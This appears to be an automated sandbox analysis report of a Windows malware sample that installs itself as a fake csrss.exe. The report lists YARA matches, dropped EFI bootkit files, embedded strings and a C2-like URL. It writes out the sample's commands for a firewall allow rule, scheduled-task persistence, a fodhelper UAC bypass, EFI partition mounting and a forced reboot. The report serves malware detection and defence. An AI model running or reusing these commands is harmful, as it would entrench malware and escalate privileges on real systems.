Source: 50.3.csrss.exe.6559a80.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 23.2.csrss.exe.5caa8d0.11.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 34.3.csrss.exe.65540e0.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 50.2.csrss.exe.9ab080.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 23.2.csrss.exe.9ad2e0.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 16.2.csrss.exe.5caa8d0.11.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 14.3.csrss.exe.65540e0.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 34.3.csrss.exe.655bce0.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 0.2.4t4y4r89UZ.exe.9ab080.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 10.2.4t4y4r89UZ.exe.9ab080.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 50.3.csrss.exe.655bce0.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Creates files inside the system directory
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe File created: C:\Windows\rss Jump to behavior
Found potential string decryption / allocating functions
Source: C:\Windows\rss\csrss.exe Code function: String function: 0042C330 appears 36 times
PE file does not import any functions
Source: EfiGuardDxe.efi.14.dr Static PE information: No import functions for PE file found
Source: bootmgfw.efi.14.dr Static PE information: No import functions for PE file found
Source: bootx64.efi.14.dr Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
Source: 4t4y4r89UZ.exe Binary or memory string: OriginalFilename vs 4t4y4r89UZ.exe
Source: 4t4y4r89UZ.exe, 00000000.00000002.292634106.0000000000C55000.00000040.00020000.sdmp Binary or memory string: OriginalFilenameDBGHELP.DLLj% vs 4t4y4r89UZ.exe
Source: 4t4y4r89UZ.exe, 00000000.00000002.292634106.0000000000C55000.00000040.00020000.sdmp Binary or memory string: OriginalFilenamesymsrv.dllj% vs 4t4y4r89UZ.exe
Source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp Binary or memory string: OriginalFilenameHamakaze.exe( vs 4t4y4r89UZ.exe
Source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameWinmonFS.sysZ vs 4t4y4r89UZ.exe
Source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamedsefix.exe. vs 4t4y4r89UZ.exe
Source: 4t4y4r89UZ.exe Binary or memory string: OriginalFilename vs 4t4y4r89UZ.exe
Source: 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameHamakaze.exe( vs 4t4y4r89UZ.exe
Source: 4t4y4r89UZ.exe, 0000000A.00000003.300061428.00000000060D3000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameDBGHELP.DLLj% vs 4t4y4r89UZ.exe
Source: 4t4y4r89UZ.exe, 0000000A.00000003.300061428.00000000060D3000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamesymsrv.dllj% vs 4t4y4r89UZ.exe
Source: 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameWinmonFS.sysZ vs 4t4y4r89UZ.exe
Source: 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamedsefix.exe. vs 4t4y4r89UZ.exe
Tries to load missing DLLs
Source: C:\Windows\System32\svchost.exe Section loaded: xboxlivetitleid.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cdpsgshims.dll Jump to behavior
PE / OLE file has an invalid certificate
Source: 4t4y4r89UZ.exe Static PE information: invalid certificate
Source: 4t4y4r89UZ.exe Virustotal: Detection: 33%
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe File read: C:\Users\user\Desktop\4t4y4r89UZ.exe Jump to behavior
Source: 4t4y4r89UZ.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\4t4y4r89UZ.exe "C:\Users\user\Desktop\4t4y4r89UZ.exe"
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
Source: unknown Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknown Process created: C:\Windows\servicing\TrustedInstaller.exe C:\Windows\servicing\TrustedInstaller.exe
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe Process created: C:\Users\user\Desktop\4t4y4r89UZ.exe C:\Users\user\Desktop\4t4y4r89UZ.exe
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe Process created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe /305-305
Source: unknown Process created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\System32\schtasks.exe schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\System32\schtasks.exe schtasks /delete /tn ScheduledUpdate /f
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
Source: C:\Windows\SysWOW64\mountvol.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe fodhelper
Source: C:\Windows\SysWOW64\mountvol.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
Source: unknown Process created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"
Source: C:\Windows\SysWOW64\mountvol.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
Source: C:\Windows\SysWOW64\mountvol.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\fodhelper.exe Process created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5
Source: C:\Windows\SysWOW64\shutdown.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe fodhelper
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes" Jump to behavior
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe Process created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe /305-305 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes Jump to behavior
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s Jump to behavior
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d Jump to behavior
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s Jump to behavior
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d Jump to behavior
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5 Jump to behavior
Source: C:\Windows\rss\csrss.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe fodhelper Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe" Jump to behavior
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
Source: C:\Windows\System32\fodhelper.exe Process created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe fodhelper
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{76A64158-CB41-11D1-8B02-00600806D9B6}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Process WHERE Name = 'roughsnow.exe'
Source: C:\Windows\System32\svchost.exe File created: C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl Jump to behavior
Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss Jump to behavior
Source: classification engine Classification label: mal100.rans.troj.evad.winEXE@62/18@12/5
Source: C:\Windows\System32\cmd.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: 4t4y4r89UZ Joe Sandbox Cloud Basic: Detection: clean Score: 0 Perma Link
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5800:120:WilError_01
Source: C:\Windows\rss\csrss.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\h48yorbq6rm87zot
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5108:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5580:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3212:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1956:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3012:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7108:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6932:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7100:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4004:120:WilError_01
Source: 4t4y4r89UZ.exe String found in binary or memory: application/app/install.go
Source: 4t4y4r89UZ.exe String found in binary or memory: application/app/install.go
Source: 4t4y4r89UZ.exe String found in binary or memory: application/resilience/btcblockchain/address.go
Source: 4t4y4r89UZ.exe String found in binary or memory: for Decryptfailed to write an injector file %s: %wfirst install, ignore discover on starthttp: putIdleConn: keep alives disabledhttps://trumops.com/api/install-failureinvalid indexed representation index %dmismatched count during itab table copymissing argume
Source: csrss.exe String found in binary or memory: application/app/install.go
Source: csrss.exe String found in binary or memory: application/resilience/btcblockchain/address.go
Source: csrss.exe String found in binary or memory: for Decryptfailed to write an injector file %s: %wfirst install, ignore discover on starthttp: putIdleConn: keep alives disabledhttps://trumops.com/api/install-failureinvalid indexed representation index %dmismatched count during itab table copymissing argume
Source: csrss.exe String found in binary or memory: application/app/install.go
Source: csrss.exe String found in binary or memory: application/resilience/btcblockchain/address.go
Source: csrss.exe String found in binary or memory: for Decryptfailed to write an injector file %s: %wfirst install, ignore discover on starthttp: putIdleConn: keep alives disabledhttps://trumops.com/api/install-failureinvalid indexed representation index %dmismatched count during itab table copymissing argume
Source: csrss.exe String found in binary or memory: application/app/install.go
Source: csrss.exe String found in binary or memory: application/resilience/btcblockchain/address.go
Source: csrss.exe String found in binary or memory: for Decryptfailed to write an injector file %s: %wfirst install, ignore discover on starthttp: putIdleConn: keep alives disabledhttps://trumops.com/api/install-failureinvalid indexed representation index %dmismatched count during itab table copymissing argume
Source: csrss.exe String found in binary or memory: application/app/install.go
Source: csrss.exe String found in binary or memory: application/resilience/btcblockchain/address.go
Source: csrss.exe String found in binary or memory: for Decryptfailed to write an injector file %s: %wfirst install, ignore discover on starthttp: putIdleConn: keep alives disabledhttps://trumops.com/api/install-failureinvalid indexed representation index %dmismatched count during itab table copymissing argume
Source: C:\Windows\rss\csrss.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\rss\csrss.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\rss\csrss.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\rss\csrss.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\rss\csrss.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\rss\csrss.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\rss\csrss.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: 4t4y4r89UZ.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: C:\Windows\System32\fodhelper.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Outlook\Capabilities\UrlAssociations
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: 4t4y4r89UZ.exe Static file information: File size 4520488 > 1048576
Source: 4t4y4r89UZ.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x437a00
Source: 4t4y4r89UZ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 4t4y4r89UZ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 4t4y4r89UZ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 4t4y4r89UZ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 4t4y4r89UZ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 4t4y4r89UZ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 4t4y4r89UZ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: Loader.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source: Binary string: EfiGuardDxe.pdb7 source: csrss.exe, csrss.exe, 00000032.00000002.400160271.0000000005200000.00000040.00000001.sdmp
Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: Age does not matchThe module age and .pdb age do not match. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: symsrv.pdb source: csrss.exe
Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: C:\Users\mac\Desktop\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7x64\x64\Release\SSDTHook.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source: Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source: Binary string: Drive not readyThis error indicates a .pdb file related failure. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
